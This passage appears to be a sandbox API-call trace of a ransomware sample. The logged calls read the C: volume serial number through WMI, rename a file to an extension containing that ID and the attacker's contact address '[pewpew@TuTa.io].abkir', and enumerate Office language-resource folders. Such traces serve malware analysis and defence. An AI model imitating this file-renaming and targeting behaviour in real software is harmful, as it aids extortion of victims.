WbemLocator:IUnknown:Release (This=0x603373c) returned 0x3 [0210.084] WbemLocator:IUnknown:Release (This=0x603373c) returned 0x2 [0210.084] SysStringLen (param_1=0x0) returned 0x0 [0210.084] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0210.084] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, pszText=0x0) returned 0x0 [0210.084] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0210.084] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0210.084] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0210.084] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5aca4) returned 0x0 [0210.085] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x3 [0210.085] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0210.085] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0210.085] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0210.085] IWbemServices:GetObject (in: This=0x603373c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6027e50, ppCallResult=0x0) returned 0x0 [0210.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0210.101] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0210.101] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0210.101] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36d9fc0*=0, plFlavor=0x36d9fc4*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36d9fc0*=8, plFlavor=0x36d9fc4*=0) returned 0x0 [0210.101] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.101] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.101] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36d9fc0*=8, plFlavor=0x36d9fc4*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36d9fc0*=8, plFlavor=0x36d9fc4*=0) returned 0x0 [0210.101] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.101] SysStringByteLen (bstr="9C354B42") returned 0x10 [0210.102] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", lpFilePart=0x0) returned 0x36 [0210.102] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x59 [0210.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0210.102] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x36820cc0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0210.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0210.102] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), lpNewFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0210.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0210.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions", lpFilePart=0x0) returned 0x2a [0210.103] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\", lpFilePart=0x0) returned 0x2b [0210.103] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb10 [0210.104] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.104] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0210.104] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0210.104] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 0 [0210.104] FindClose (in: hFindFile=0xb7fb10 | out: hFindFile=0xb7fb10) returned 1 [0210.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0210.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0210.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0210.104] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions", lpFilePart=0x0) returned 0x2a [0210.104] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\", lpFilePart=0x0) returned 0x2b [0210.105] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb10 [0210.105] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.105] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0210.105] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0210.105] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0210.105] FindClose (in: hFindFile=0xb7fb10 | out: hFindFile=0xb7fb10) returned 1 [0210.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0210.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0210.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0210.105] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036", lpFilePart=0x0) returned 0x2f [0210.106] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpFilePart=0x0) returned 0x30 [0210.106] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fb10 [0210.291] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0211.524] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0211.524] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xbf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0211.524] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0211.524] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x49f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0211.524] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x0, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0211.525] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x17960, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0211.525] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2ced60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0211.525] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa381000, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xaa381000, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0211.525] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0211.525] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3fb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0211.526] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x37560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0211.526] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0xa6560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0211.526] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0211.526] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0xcd60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0211.526] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0x45f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0211.526] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3b09500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa3b09500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a360, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0211.527] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x8e160, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0211.527] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749d2200, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x749d2200, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x5ab60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0211.527] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d7a1200, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6d7a1200, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x0, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0211.527] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8e7d800, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc8e7d800, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4160, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0211.527] FindNextFileW (in: hFindFile=0xb7fb10, lpFindFileData=0x691f0c4 | out: 